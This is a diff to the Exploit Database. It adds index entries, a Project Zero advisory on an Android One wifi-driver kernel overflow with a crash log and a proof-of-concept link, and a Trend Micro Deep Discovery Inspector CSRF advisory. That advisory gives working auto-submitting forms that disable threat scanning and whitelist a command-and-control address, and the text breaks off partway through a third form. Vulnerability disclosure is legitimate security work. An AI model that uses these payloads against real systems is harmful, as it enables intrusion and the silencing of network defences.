38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme 'ID' Parameter SQL Injection Vulnerability",2012-11-09,sil3nt,php,webapps,0
@ -34493,7 +34493,7 @@ id,file,description,date,author,platform,type,port
38184,platforms/php/webapps/38184.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0
38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0
38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80
@ -34599,7 +34599,7 @@ id,file,description,date,author,platform,type,port
38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 Local Buffer Overflow Privilege Escalation Vulnerability",2012-02-25,"Nikita Tarakanov",windows,local,0
38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-01-31,hiphop,php,webapps,0
38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting Vulnerability",2013-02-09,"Henrique Montenegro",php,webapps,0
38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667
38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667
38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0
38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0
38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0
@ -34656,7 +34656,7 @@ id,file,description,date,author,platform,type,port
38357,platforms/linux/local/38357.c,"rpi-update Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0
38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting Vulnerability",2013-03-04,"Julien Ahrens",java,webapps,0
38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0
38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
@ -34857,7 +34857,7 @@ id,file,description,date,author,platform,type,port
38571,platforms/php/webapps/38571.txt,"mkCMS 'index.php' Arbitrary PHP Code Execution Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
38573,platforms/php/webapps/38573.txt,"eBay Magento <= 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps,0
38574,platforms/php/webapps/38574.html,"PHP Server Monitor 3.1.1- CSRF Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps,0
38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0
38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0
38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Local Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0
38577,platforms/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injection Vulnerabilities",2015-10-30,"Curesec Research Team",php,webapps,0
38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0
@ -35137,11 +35137,11 @@ id,file,description,date,author,platform,type,port
38864,platforms/php/webapps/38864.php,"NeoBill /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
38865,platforms/php/webapps/38865.txt,"NeoBill /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download v1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress v1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection Vulnerability",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0
38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= v8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0
38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= 8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0
38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin 'bwbps-uploader.php' Arbitrary File Upload Vulnerability",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0
38873,platforms/php/webapps/38873.txt,"eduTrac 'showmask' Parameter Directory Traversal Vulnerability",2013-12-11,"High-Tech Bridge",php,webapps,0
38874,platforms/php/webapps/38874.txt,"BoastMachine 'blog' Parameter SQL Injection Vulnerablity",2013-12-13,"Omar Kurt",php,webapps,0
@ -35710,7 +35710,7 @@ id,file,description,date,author,platform,type,port
39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0
39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0
39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0
39471,platforms/windows/dos/39471.txt,"STIMS Buffer - Buffer Overflow SEH - DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0
39472,platforms/windows/dos/39472.txt,"STIMS Cutter - Buffer Overflow DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0
39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability",2016-02-19,Vulnerability-Lab,php,webapps,0
@ -35800,6 +35800,7 @@ id,file,description,date,author,platform,type,port
39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent XSS",2016-03-28,"Sarim Kiani",multiple,webapps,80
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
@ -35828,6 +35829,7 @@ id,file,description,date,author,platform,type,port
39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8_ 3.7 - CSRF Vulnerabilities",2016-03-27,hyp3rlinx,hardware,webapps,80
39599,platforms/windows/remote/39599.txt,"Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0
39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0
39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0
@ -35847,3 +35849,9 @@ id,file,description,date,author,platform,type,port
39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0
39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0
39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86_x64 - execve(/bin/sh) - 26 bytes",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86_x64 - execve(/bin/sh) - 25 bytes",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86_x64 - execve(/bin/bash) - 33 bytes",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69
39628,platforms/linux/local/39628.txt,"FireEye - Privilege Escalation to root from Malware Input Processor (uid=mip)",2016-03-28,"Google Security Research",linux,local,0
39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0
39630,platforms/windows/local/39630.g,"Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0

Can't render this file because it is too large.

163
platforms/android/dos/39629.txt Executable file
View file

@ -0,0 +1,163 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678
The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL.
This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET.
See
hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.
[ 56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: G W 3.10.57-g9e1c396 #1
[ 56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000
[ 56.845731]-(0)[880:tx_thread]PC is at 0x40404040
[ 56.846319]-(0)[880:tx_thread]LR is at kalDevPortWrite+0x1c8/0x484
[ 56.847092]-(0)[880:tx_thread]pc : [<40404040>] lr : [<c0408be4>] psr: a0000013
[ 56.847092]sp : cb99fdb0 ip : c001813c fp : cb99fe0c
[ 56.848705]-(0)[880:tx_thread]r10: c0cac2f0 r9 : 0000af00 r8 : 00000110
[ 56.849552]-(0)[880:tx_thread]r7 : 0000002c r6 : cc0a63c0 r5 : 00000001 r4 : c0cade08
[ 56.850560]-(0)[880:tx_thread]r3 : 40404040 r2 : 00000040 r1 : dd5d0110 r0 : 00000001
[ 56.851570]-(0)[880:tx_thread]Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel
[ 56.852675]-(0)[880:tx_thread]Control: 10c5387d Table: 9e9b006a DAC: 00000015
[ 56.853585]-(0)[880:tx_thread]
[ 56.853585]LR: 0xc0408b64:
[ 56.854297]8b64 e50b3028 e3a03000 e50b3044 0a00008a e590c0d0 e30639ac e34c30a8 e35c0000
[ 56.855306]8b84 01a0c003 e2851103 e30c3940 e34c30bc e7eb2055 e1a01621 e3a05001 e593e000
[ 56.856314]8ba4 e3a03000 e1a01281 e58d3004 e28114ff e58d5000 e1a03008 e08e1001 e59cc010
[ 56.857323]8bc4 e12fff3c e5943014 e3530000 e50b002c 0a000002 e5933018 e1a00005 e12fff33
[ 56.858332]8be4 e59635cc e2867e5a e2877004 e24b1048 e30650c0 e34c50a6 e1a00007 e5933000
[ 56.859340]8c04 e12fff33 e59635cc e1a00007 e5933004 e12fff33 e5959000 e2899f7d e5953000
[ 56.860349]8c24 e30610c0 e1a00007 e34c10a6 e0693003 e3530000 aa00005b e59635cc e5933010
[ 56.861358]8c44 e12fff33 e3500000 0afffff3 e59635cc e1a00007 e30856a1 e3405001 e5933014
[ 56.862369]-(0)[880:tx_thread]
[ 56.862369]SP: 0xcb99fd30:
[ 56.863083]fd30 00000001 00000110 00000000 40404040 a0000013 ffffffff cb99fd9c 00000110
[ 56.864091]fd50 0000af00 c0cac2f0 cb99fe0c cb99fd68 c000e1d8 c00084b8 00000001 dd5d0110
[ 56.865100]fd70 00000040 40404040 c0cade08 00000001 cc0a63c0 0000002c 00000110 0000af00
[ 56.866108]fd90 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 ffffffff
[ 56.867117]fdb0 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 00000000
[ 56.868126]fdd0 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 e54af000
[ 56.869135]fdf0 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 c0408a28
[ 56.870143]fe10 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 e54b5d14
[ 56.871155]-(0)[880:tx_thread]
[ 56.871155]IP: 0xc00180bc:
[ 56.871868]80bc ee070f36 e0800002 e1500001 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823
[ 56.872877]80dc e203300f e3a02004 e1a02312 e2423001 e1c00003 ee070f3a e0800002 e1500001
[ 56.873885]80fc 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 e203300f e3a02004 e1a02312
[ 56.874894]811c e2423001 e1c00003 ee070f3e e0800002 e1500001 3afffffb f57ff04f e1a0f00e
[ 56.875902]813c e0811000 e3320002 0affffd0 eaffffe1 e0811000 e3320001 1affffcc e1a0f00e
[ 56.876911]815c 00007fff 000003ff e1a0c00d e92dd830 e24cb004 e1a05000 e1a00001 ebfffe6a
[ 56.877920]817c e1a04000 e1a00005 ebfffe67 e1a01004 e1a05000 eb09bf2a e1a00005 ebfffeaa
[ 56.878929]819c e1a00004 ebfffea8 e89da830 e1a0c00d e92dd818 e24cb004 ebfffe5b e3a01a01
[ 56.879940]-(0)[880:tx_thread]
[ 56.879940]FP: 0xcb99fd8c:
[ 56.880653]fd8c 0000af00 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013
[ 56.881662]fdac ffffffff 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000
[ 56.882671]fdcc 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168
[ 56.883679]fdec e54af000 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164
[ 56.884688]fe0c c0408a28 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10
[ 56.885697]fe2c e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 c03da49c e54b6168 e54af000
[ 56.886705]fe4c c0cac2f0 00000000 e54af000 00000000 c0cac2f0 cb99fe8c cb99fe70 c03bd0f4
[ 56.887714]fe6c c03dae1c 00000001 00000000 e54b6168 00000000 cb99fee4 cb99fe90 c03bd540
[ 56.888726]-(0)[880:tx_thread]
[ 56.888726]R1: 0xdd5d0090:
[ 56.889439]0090 00000002 60070193 c0a9d860 00000001 00000003 0d050d04 60070193 60070193
[ 56.890447]00b0 c0a8d800 00002ab0 cb99fe9c cb99fe50 c00d3a84 c001ee84 0b93115f 00000000
[ 56.891456]00d0 ffffffff 00000000 00000036 00000000 75fd19aa cb99fea0 e54dfac4 e54dfab8
[ 56.892465]00f0 e54dfac4 60070113 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99fec4 062e062d
[ 56.893473]0110 00000000 c2ec5c43 e91cd01a 3ef74ed2 256fb013 c9a73709 0d15c700 aa03b775
[ 56.894482]0130 10b66433 696d6e70 4f66e845 6fc5d5f5 fffd363f a9960104 61007ab4 5b193ffc
[ 56.895491]0150 25b0d02e 7fbf9ac1 c3de7bb9 b7bc184f 47c837ed 0d3b82cd aa3d7d38 72ac0fad
[ 56.896499]0170 a469220b 96e646bc 49677d77 a6fae9d7 2d03b2c7 a52e0556 16f0641d 96c95111
[ 56.897511]-(0)[880:tx_thread]
[ 56.897511]R4: 0xc0cadd88:
[ 56.898224]dd88 c0cadc88 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.899233]dda8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.900241]ddc8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.901250]dde8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.902259]de08 41414142 41414141 41414141 41414141 41414141 c0cadc90 000001d3 000001d3
[ 56.903267]de28 000001d2 000000ca 000000c7 00000000 00000000 00000000 00000000 00000000
[ 56.904276]de48 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.905285]de68 00000000 00000000 c04265ec 00000000 00000000 00000000 00000000 00000000
[ 56.906297]-(0)[880:tx_thread]
[ 56.906297]R6: 0xcc0a6340:
[ 56.907009]6340 00000000 00000000 00000000 dead4ead ffffffff ffffffff cc0a6358 cc0a6358
[ 56.908018]6360 df8f9674 dfba8764 df8f9684 00000001 c0b45604 00000000 00000000 00000000
[ 56.909027]6380 00000001 de764130 00000000 00000000 c080e18c 00000000 00000000 00000000
[ 56.910035]63a0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.911044]63c0 dd9e1000 00000000 00000075 0000007f 0000a051 00006107 00000000 00000000
[ 56.912053]63e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.913062]6400 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.914070]6420 00000000 cb000000 00000700 00000000 00000000 00000000 00000000 00000000
[ 56.915082]-(0)[880:tx_thread]
[ 56.915082]R10: 0xc0cac270:
[ 56.915806]c270 7f54e330 00000000 7f54e330 00000000 7f5b84c9 00000004 00000000 00000000
[ 56.916814]c290 00000000 00000000 00000001 00000001 00000001 00000000 00000000 00000000
[ 56.917823]c2b0 00000001 00000000 dead4ead ffffffff ffffffff c0cac2c4 c0cac2c4 00000000
[ 56.918832]c2d0 00000000 00000001 600f0113 000c000c dead4ead ffffffff ffffffff 00000000
[ 56.919840]c2f0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.920849]c310 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.921858]c330 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.922866]c350 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.923880]-(0)[880:tx_thread]Process tx_thread (pid: 880, stack limit = 0xcb99e248)
[ 56.924845]-(0)[880:tx_thread]Stack: (0xcb99fdb0 to 0xcb9a0000)
[ 56.925584]-(0)[880:tx_thread]fda0: 00000001 00000000 c07aeeb8 c029c4b0
[ 56.926801]-(0)[880:tx_thread]fdc0: c0b9d340 00000110 00000000 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670
[ 56.928016]-(0)[880:tx_thread]fde0: 9d5d0000 180f002c e54b6168 e54af000 e54b5d10 00000110 dd5d0000 00000000
[ 56.929230]-(0)[880:tx_thread]fe00: cb99fe6c cb99fe10 c03db164 c0408a28 0000af00 00000004 cb99fe44 cb99fe28
[ 56.930445]-(0)[880:tx_thread]fe20: c03eddf4 00000001 00007d10 e54b5d14 e54af000 00000000 cb99fe6c cb99fe48
[ 56.931660]-(0)[880:tx_thread]fe40: c03da49c e54b6168 e54af000 c0cac2f0 00000000 e54af000 00000000 c0cac2f0
[ 56.932874]-(0)[880:tx_thread]fe60: cb99fe8c cb99fe70 c03bd0f4 c03dae1c 00000001 00000000 e54b6168 00000000
[ 56.934089]-(0)[880:tx_thread]fe80: cb99fee4 cb99fe90 c03bd540 c03bcf6c 000007d0 cc0a63c0 00000000 00000000
[ 56.935304]-(0)[880:tx_thread]fea0: c000009a cc0a6a50 00000000 00000000 cc0a65f8 80000013 cc0a6464 cc0a63c0
[ 56.936519]-(0)[880:tx_thread]fec0: cc0a6a5c cb99e000 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99ff44 cb99fee8
[ 56.937734]-(0)[880:tx_thread]fee0: c03efce4 c03bd300 dd6b1dd4 a0070013 c0cade28 cb99e028 c0090920 cc0a6a50
[ 56.938948]-(0)[880:tx_thread]ff00: 01a5fc40 00000000 dea3b480 c0090920 cb99ff10 cb99ff10 c03ef9d4 dd5bfdbc
[ 56.940163]-(0)[880:tx_thread]ff20: 00000000 dd9e1000 c03ef9d4 00000000 00000000 00000000 cb99ffac cb99ff48
[ 56.941378]-(0)[880:tx_thread]ff40: c008fadc c03ef9e0 ffffffff 00000000 df9958c0 dd9e1000 00000000 00000000
[ 56.942593]-(0)[880:tx_thread]ff60: dead4ead ffffffff ffffffff cb99ff6c cb99ff6c 00000000 00000000 dead4ead
[ 56.943807]-(0)[880:tx_thread]ff80: ffffffff ffffffff cb99ff88 cb99ff88 dd5bfdbc c008fa20 00000000 00000000
[ 56.945022]-(0)[880:tx_thread]ffa0: 00000000 cb99ffb0 c000e618 c008fa2c 00000000 00000000 00000000 00000000
[ 56.946236]-(0)[880:tx_thread]ffc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.947452]-(0)[880:tx_thread]ffe0: 00000000 00000000 00000000 00000000 00000013 00000000 ffffffff ffffffff
[ 56.948658]Backtrace:
[ 56.948966]-(0)[880:tx_thread][<c0408a1c>] (kalDevPortWrite+0x0/0x484) from [<c03db164>] (nicTxCmd+0x354/0x638)
[ 56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000
r4:e54b6168
[ 56.951190]-(0)[880:tx_thread][<c03dae10>] (nicTxCmd+0x0/0x638) from [<c03bd0f4>] (wlanSendCommand+0x194/0x220)
[ 56.952449]-(0)[880:tx_thread][<c03bcf60>] (wlanSendCommand+0x0/0x220) from [<c03bd540>] (wlanProcessCommandQueue+0x24c/0x474)
[ 56.953859] r6:00000000 r5:e54b6168 r4:00000000 r3:00000001
[ 56.954568]-(0)[880:tx_thread][<c03bd2f4>] (wlanProcessCommandQueue+0x0/0x474) from [<c03efce4>] (tx_thread+0x310/0x640)
[ 56.955927]-(0)[880:tx_thread][<c03ef9d4>] (tx_thread+0x0/0x640) from [<c008fadc>] (kthread+0xbc/0xc0)
[ 56.957088]-(0)[880:tx_thread][<c008fa20>] (kthread+0x0/0xc0) from [<c000e618>] (ret_from_fork+0x14/0x3c)
[ 56.958270] r7:00000000 r6:00000000 r5:c008fa20 r4:dd5bfdbc
[ 56.958970]-(0)[880:tx_thread]Code: bad PC value
[ 56.959544]-(0)[880:tx_thread]---[ end trace 1b75b31a2719ed1f ]---
[ 56.960313]-(0)[880:tx_thread]Kernel panic - not syncing: Fatal exception
The vulnerable code is in /drivers/misc/mediatek/conn_soc/drv_wlan/mt_wifi/wlan/os/linux/gl_wext_priv.c:1632
case PRIV_CMD_SW_CTRL:
pu4IntBuf = (PUINT_32)prIwReqData->data.pointer;
prNdisReq = (P_NDIS_TRANSPORT_STRUCT) &aucOidBuf[0];
//kalMemCopy(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, 8);
if (copy_from_user(&prNdisReq->ndisOidContent[0],
prIwReqData->data.pointer,
prIwReqData->data.length)) {
status = -EFAULT;
break;
}
prNdisReq->ndisOidCmd = OID_CUSTOM_SW_CTRL;
prNdisReq->inNdisOidlength = 8;
prNdisReq->outNdisOidLength = 8;
/* Execute this OID */
status = priv_set_ndis(prNetDev, prNdisReq, &u4BufLen);
break;
prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqData->data.length is a usermode controlled unsigned short, so the copy_from_user results in memory corruption.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39629.zip

360
platforms/hardware/webapps/39622.txt Executable file
View file

@ -0,0 +1,360 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt
Vendor:
====================
www.trendmicro.com
Product:
=========================================
Trend Micro Deep Discovery Inspector
V3.8, 3.7
Deep Discovery Inspector is a network appliance that gives you 360-degree
network monitoring of all traffic
to detect all aspects of a targeted attack.
Vulnerability Type:
================================
Cross Site Request Forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
================================
Trend Micro Deep Discovery suffers from multiple CSRF vectors, if an
authenticated user visits an malicious webpage attackers will
have ability to modify many settings of the Deep Discovery application to
that of the attackers choosing.
Reference:
http://esupport.trendmicro.com/solution/en-US/1113708.aspx
Trend Micro DDI is affected by CSRF vulnerabilities. These affect the
following console features:
Deny List Notifications
Detection Rules
Threat Detections
Email Settings
Network
Blacklisting/Whitelisting
Time
Accounts
Power Off / Restart
DETAILS
The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are
affected:
3.8 English
3.8 Japanese
3.7 English
3.7 Japanese
3.7 Simplified Chinese
Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1
must upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue.
Exploit code(s):
===============
1) Shut down all threat scans and malicious file submissions under:
Administration /Monitoring / Scanning / Threat Detections
<iframe id="demonica" name="demonica"></iframe>
<form id="CSRF-ThreatScans" target="demonica" action="
https://localhost/php/scan_options.php" method="post">
<input type="hidden" name="act" value="set" />
<input type="hidden" name="enable_all" value="0" />
<input type="hidden" name="enable_vsapi" value="1" />
<input type="hidden" name="enable_marsd" value="1" />
<input type="hidden" name="enable_ops" value="1" />
<input type="hidden" name="enable_block" value="0" />
<input type="hidden" name="enable_feedback" value="0" />
<input type="hidden" name="enable_send_suspicious_file" value="0" />
<script>document.getElementById('CSRF-ThreatScans').submit()</script>
</form>
2) Whitelist C&C server menu location: Detections / C&C Callback Addresses
<form id="CSRF-Whitelist" target="demonica" action="
https://localhost/php/blacklist_whitelist_query.php" method="post">
<input type="hidden" name="black_or_white" value="ccca" />
<input type="hidden" name="action" value="move_to_white_ccca" />
<input type="hidden" name="delete_list" value='"list":[{"name":"
http://bad.place.com/","list_type":"3"}]}"' />
<input type="hidden" name="comments" value="TEST" />
<script>document.getElementById('CSRF-Whitelist').submit()</script>
</form>
3) Turn off or change email notifications
<form id="CSRF-Notifications" target="demonica" action="
https://localhost/cgi-bin/mailSettings_set.cgi" method="post">
